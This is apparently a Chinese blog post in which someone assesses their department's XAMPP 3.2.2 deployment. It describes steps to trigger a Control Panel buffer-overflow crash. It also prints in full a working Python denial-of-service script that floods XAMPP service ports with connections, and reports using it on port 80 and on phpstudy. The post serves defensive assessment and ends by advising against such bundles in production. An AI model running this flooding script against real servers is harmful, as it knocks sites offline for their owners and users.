最近在看通用漏洞,发现我们部门网站使用了xampp3.2.2做网站部署,使用这种继承软件包会有很多问题,在网上搜了搜,发现最近还有公布的漏洞。
一个是今年9月出的一个XAMPP Control Panel 3.2.2 Buffer Overflow;另一个是几年前的一个远程拒绝服务,就是简单的dos或者cc。
#0x01 XAMPP Control Panel 3.2.2 Buffer Overflow
网上共找到两种Poc:
http://www.vfocus.net/art/20181220/15036.html
http://www.vfocus.net/art/20180917/14798.html
下载运行脚本,会生成一个exploit.txt文件。
在Control Panel里点击右上角的config,将exlpoit里的内容复制到editor和browser里,保存。
然后点击查看httpd.conf文件,会弹出崩溃。
崩溃后web进程并没有中断,并没有达成拒绝服务,只是程序崩溃而已,貌似价值不高。
#0x02XAMPP Control Panel - Denial Of Service
找到一个poc:
https://www.anquanke.com/vul/id/1067740
大体意思就是在xampp监听的这些端口:
(MySQL) 3306 v3.2.2 (Tomcat) 8080 (XAMPP v3.1.0) (FileZilla) 21 (Mercury Mail) 25 (XAMPP v3.1.0),79,105,106,143.
如果发送大量的垃圾数据,就会造成内存崩溃和拒绝服务。
POC:
import socket print "XAMPP Control Panel DOS" print "Discovery: John Page (hyp3rlinx)" print "ApparitionSec" print "hyp3rlinx.altervista.org\r\n" IP = raw_input("[IP]> ") PORT = raw_input("[PORT]> ") arr=[] c=0 while 1: try: arr.append(socket.create_connection((IP,PORT))) arr[c].send("DOOM") print "Die!" c+=1 except socket.error: print "[+] Done! " raw_input() break
对xampp的80端口尝试攻击:
效果显著。中断脚本后,网站即可恢复。
想到其他建站工具也可能有这种问题,又拿脚本测了下phpstudy,同样可以实现拒绝服务。
#0x03
网站正式部署最好不要用这些集成工具包,一个是很容易由于默认配置遭到入侵,还有这种dos攻击抗性太差。